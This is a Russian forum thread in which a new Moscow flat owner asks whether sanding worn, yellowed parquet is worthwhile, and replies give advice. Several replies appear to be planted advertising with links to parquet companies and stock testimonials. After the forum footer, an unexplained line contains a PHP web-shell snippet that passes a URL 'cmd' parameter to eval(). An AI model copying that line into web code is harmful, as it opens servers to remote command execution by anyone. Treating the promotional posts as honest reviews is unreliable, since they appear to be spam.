+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Циклевка паркета


  1. #1
    Мимо проходил Maximum is on a distinguished road Аватар для Maximum
    Регистрация
    02.12.2018
    Откуда
    Неизвестно
    Машина
    WV Golf
    Сообщений
    14

    Циклевка паркета

    Всем привет, мы тут купили квартиру в Москве, делаем ремонт, но есть кое-какие сомнения насчет напольного покрытия. Здесь установлен паркет, видимо давно никто им не занимался и внешне он весьма потрепанный, пожелтевший и есть перепады между паркетными плашками. Есть идея заказать циклевку, только думаем - а поможет она и не будет ли это трата денег на ветер?

  2. #2
    Мимо проходил Dennis is on a distinguished road Аватар для Dennis
    Регистрация
    30.11.2018
    Откуда
    Россия
    Машина
    gti
    Сообщений
    16
    Смотрите на общее состояние паркета, ведь если ситуация сильно запущена, то придется выложить немало денег на реставрацию, одной циклевки может быть недостаточно. Вообще паркет - это дорогое удовольствие, за ним нужен постоянный уход, который влетит вам в копеечку.

  3. #3
    Мимо проходил Braan is on a distinguished road Аватар для Braan
    Регистрация
    26.11.2018
    Откуда
    Россия
    Машина
    gti
    Сообщений
    19
    Ситуации бывают разные, однозначно я бы не стал делать поспешных решений и избавляться от паркета, узнайте мнение специалистов на этот счет. Например вот здесь видел информацию о циклевке паркета http://novparket.ru/, особенно гляньте фотографии работ До и После, так что думаю даже в запущенных случаях можно попробовать все исправить.

  4. #4
    Мимо проходил Klon is on a distinguished road Аватар для Klon
    Регистрация
    24.11.2018
    Откуда
    World
    Машина
    WV Golf
    Сообщений
    18
    Обратитесь в пару компаний по реставрации, сравните цены на услуги и потом уже решайте. Если плашки уже расшатались, тогда конечно реставрация выйдет дороже, а так вообще отшлифовать поверхность и вскрыть новым слоем лака не так уж и трудно, можно даже самостоятельно это все сделать.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Тут нужно сначала оценить состояние паркета в целом. То, что он пожелтевший, это ерунда, можно ведь сделать циклевку, отшлифовать его и покрыть лаком. Это все можно и самому сделать. У нас в Екатеринбурге, например, можно взять шлифмашину напрокат https://vprokat96.ru/katalog/shlifmashinyi/. Думаю, в Москве с этим проблем тоже не будет. Но сначала нужно отремонтировать паркет - замазать щели, посмотреть, чтобы плашки нигде не болтались, не скрипели и т.п.

  6. #6
    GTI-Racing Kurdt is on a distinguished road Аватар для Kurdt
    Регистрация
    17.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    473
    Здравствуйте. Могу порекомендовать уже проверенный вариант.
    Вот укладка паркета https://dok-parket.ru/ukladka-parketnoj-doski/
    Я в свое время именно к ним обращался за помощью.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Тоже ищу циклевку паркета по Москве. куда обратиться?

  8. #8
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Недавно тоже возникли небольшие проблемы с паркетом, нужно было провести оперативную и относительно недорогую реставрацию. Посмотрели немало компаний, сравнивали условия и расценки, по итогу нашли мастеров, которые нам сделали реставрацию паркета на тех условиях, которые вполне устроили. По времени где-то часа 2-3 все заняло, мне понравилось, что мастера выезжают в день заказа, плюс к этому, дают гарантию на проделанные работы на 3 года, что, однозначно, плюс.

  9. #9
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Хочу выразить свою благодарность компании https://ciklevka-parketa-cena.ru/ за качественную циклевку паркета в моей квартире в Москве. Они сделали все очень быстро и профессионально, а также помогли вынести мебель. Я рекомендую эту компанию всем, кто ищет высококачественную работу по доступным ценам.

+ Ответить в теме

Похожие темы

  1. Продаю грунты, лаки для мебели и паркета
    от AXeL! в разделе Барахолка
    Ответов: 2
    Последнее сообщение: 01.04.2024, 23:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}